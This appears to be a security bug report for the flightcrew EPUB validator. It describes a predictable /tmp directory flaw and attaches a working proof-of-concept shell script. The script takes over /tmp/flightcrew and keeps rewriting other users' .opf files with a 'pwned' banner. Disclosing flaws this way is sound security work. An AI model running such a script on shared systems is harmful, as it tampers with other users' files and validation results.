Package: flightcrew Version: 0.7.2+dfsg-8 Tags: security
flightcrew creates temporary files in /tmp/flightcrew/, even when this directory belongs to another user. Malicious user could exploit this to tamper with other users' temporary files; probably also to overwrite arbitrary files via symlink attack.
I've attached proof-of-concept exploit. When it is running, all users will be getting spurious validation errors:
$ whoami jwilk $ ls -ld /tmp/flightcrew/ drwxrwxrwx+ 3 mallory mallory 60 May 6 22:58 /tmp/flightcrew/ $ flightcrew-cli EpubValidates_Valid.epub EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's "version" attribute value needs to be "2.0", but is " _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ". -- Jakub Wilk
#!/bin/sh set -e -u mkdir -m 777 /tmp/flightcrew cd /tmp/flightcrew setfacl -d -m "u:$USER:rwx" . msg=' _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ' msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\</g' -e 's/$/\\\ /' | tr -d '\n') while true do find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e "s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true done